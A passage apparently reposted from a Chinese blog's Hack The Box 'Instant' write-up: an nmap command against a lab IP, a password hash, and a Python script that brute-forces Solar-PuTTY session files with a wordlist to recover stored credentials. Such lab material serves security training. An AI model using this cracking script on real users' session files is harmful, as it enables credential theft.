知识点:APK反编译、本地文件包含、Solar-PuTTYSession文件解密
nmap -sC -sV -O -oN nmap.txt 10.10.11.36
pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed
import base64
import sys
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2
def decrypt(passphrase, ciphertext):
data = ''
try:
# Decode the base64 encoded ciphertext
array = base64.b64decode(ciphertext)
salt = array[:24]
iv = array[24:32]
encrypted_data = array[48:]
# Derive the key using PBKDF2
key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
# Create the Triple DES cipher in CBC mode
cipher = DES3.new(key, DES3.MODE_CBC, iv)
# Decrypt the data
decrypted_data = cipher.decrypt(encrypted_data)
# Remove padding (PKCS7 padding)
padding_len = decrypted_data[-1]
decrypted_data = decrypted_data[:-padding_len]
data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
except Exception as e:
print(f'Error: {e}')
return data
if len(sys.argv) < 3:
print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
exit(1)
with open(sys.argv[1]) as f:
cipher = f.read()
with open(sys.argv[2]) as passwords:
for i, password in enumerate(passwords):
password = password.strip()
decrypted = decrypt(password, cipher)
print(f'[{i}] {password=}', end='r')
if 'Credentials' in decrypted:
print(f'r[{i}] {password=} {" " * 10}')
print()
print(decrypted)
break
原文始发于微信公众号(Rsec):HTB靶场 Instant(Linux)[Me]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论